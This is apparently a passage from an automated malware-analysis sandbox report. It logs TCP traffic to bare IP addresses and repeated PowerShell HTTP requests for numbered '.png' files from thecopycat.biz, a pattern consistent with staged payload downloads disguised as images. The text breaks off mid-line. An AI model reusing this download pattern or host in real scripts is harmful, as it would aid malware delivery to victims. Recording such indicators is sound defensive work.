                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.22
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                        Source: global trafficHTTP traffic detected: GET /o/1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.bizConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /o/2.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
                        Source: global trafficHTTP traffic detected: GET /o/3.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
                        Source: global trafficHTTP traffic detected: GET /o/4.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
                        Source: global trafficHTTP traffic detected: GET /o/5.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: thecopycat.biz
                        Source: global trafficHTTP traffic detected: GET /o/6.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerS